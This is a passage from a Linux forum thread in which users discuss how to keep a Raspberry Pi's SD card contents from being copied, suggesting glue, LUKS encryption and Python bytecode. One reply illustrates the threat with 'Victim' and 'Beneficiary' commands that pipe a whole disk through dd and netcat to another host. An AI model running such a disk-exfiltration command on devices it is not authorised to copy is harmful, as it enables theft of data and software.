WelcomeWelcome | FAQFAQ | DownloadsDownloads | WikiWiki

Author Topic: protect boot code  (Read 2021 times)

Offline PDP-8

  • Hero Member
  • *****
  • Posts: 905
Re: protect boot code
« Reply #15 on: November 17, 2021, 03:35:05 AM »
If the biggest fear is removal of the sdcard and copying by unauthorized parties, then the simplest answer at the pi's price point is to cause physical damage to it by doing so.

You can super-glue the sdcard into the holder with a few drops but not on the contact pins of course.  Attempts to remove it will usually damage the sdcard.

Drastic?  Yes.
That's a UNIX book! - cool  -- Garth

Offline nick65go

  • Hero Member
  • *****
  • Posts: 595
Re: protect boot code
« Reply #16 on: November 17, 2021, 03:46:44 AM »
yes, I like this solution! This is the spirit on tiny, think out-of-the-box, do not follow the conventions /crowd. ;) or you will have the results (usually modest) of the commons.

Offline gadget42

  • Full Member
  • ***
  • Posts: 248
Re: protect boot code
« Reply #17 on: November 17, 2021, 05:58:44 AM »
nothing beats(pun intended) xkcd

https://xkcd.com/538/

and the vast majority will only require being SHOWN the wrench(truncheon)...

Offline patrikg

  • Sr. Member
  • ****
  • Posts: 409
Re: protect boot code
« Reply #18 on: November 17, 2021, 07:03:06 AM »
Can you easy extract the serial number of the pi and use that to encrypt/decrypt the Linux partition with luks.

Online Rich

  • Administrator
  • Hero Member
  • *****
  • Posts: 10149
Re: protect boot code
« Reply #19 on: November 17, 2021, 07:06:24 AM »
Hi ketank
So I need to generate the bytecode on the same machine and leave it there as an executable.
The bytecode is portable as long as the target has the same version of Python. In fact, according to the Interweb, it's
even portable between platforms (ARM, x86, x86_64, etc.).

Online Rich

  • Administrator
  • Hero Member
  • *****
  • Posts: 10149
Re: protect boot code
« Reply #20 on: November 17, 2021, 07:51:33 AM »
Hi PDP-8
If the biggest fear is removal of the sdcard and copying by unauthorized parties, ...

 ... You can super-glue the sdcard into the holder ...
Sure, that might stop me if I want to remove the card and copy it. But what if I want to copy it while it is still installed?
What are my options then?

Could I plug in a USB drive and copy everything over to that?

Could I boot off of a USB drive so the SD card is not mounted, and then use  dd  and  nc (netcat)  to copy the drive:
Victim:
Code: [Select]
dd if=/dev/sda PIPE nc 192.168.1.30 9000Forum error: Replace the word  PIPE  with a pipe symbol.

Beneficiary (192.168.1.30):
Code: [Select]
nc -l -p 9000 | dd of=/dev/sdc
Even if still mounted, this should still work well enough to get what you want.

Offline ketank

  • Newbie
  • *
  • Posts: 40
  • learning ...
Re: protect boot code
« Reply #21 on: November 19, 2021, 12:35:19 AM »
Hi ketank
So I need to generate the bytecode on the same machine and leave it there as an executable.
The bytecode is portable as long as the target has the same version of Python. In fact, according to the Interweb, it's
even portable between platforms (ARM, x86, x86_64, etc.).

This is really good.

Offline bmarkus

  • Administrator
  • Hero Member
  • *****
  • Posts: 7165
    • My Community Forum
Re: protect boot code
« Reply #22 on: November 19, 2021, 12:57:55 AM »
Bytecode doesn't protect against copying and also can be decompiled. It doesn't give a protection just make distribution possibly easier.

Béla
Ham Radio callsign: HA5DI

"Amateur Radio: The First Technology-Based Social Network."

Offline PDP-8

  • Hero Member
  • *****
  • Posts: 905
Re: protect boot code
« Reply #23 on: November 19, 2021, 02:35:53 PM »
Heh, my superglue technique only came from a friend's RPI running in a large scale model aircraft.  The pi only had a pressure-fit slot and kept losing contact in the aircraft.

At the end of the day, words like protecting your IP may indicate that *any* form of gnu/linux may not be the best vehicle for this project, whereas something BSD'ish would.

So Ketank, with us lacking details, instead of copying your card and all it's IP, what if I simply ask you to provide me with your source code and you refuse?  Depending on what you are actually doing, that could land you in hot water to some degree.  Hence the recommendation to use BSD for this task since it appears not to be aimed at data privacy, but more of a commercial outlook to stymie possible competitors.

In other words, all our attempts to solve this problem may be for naught if at the end of the day it violates the gnu license.  But I get it - if you provide more details on what you are doing, competitors might figure it out!  Heh, the catch 22. :)


That's a UNIX book! - cool  -- Garth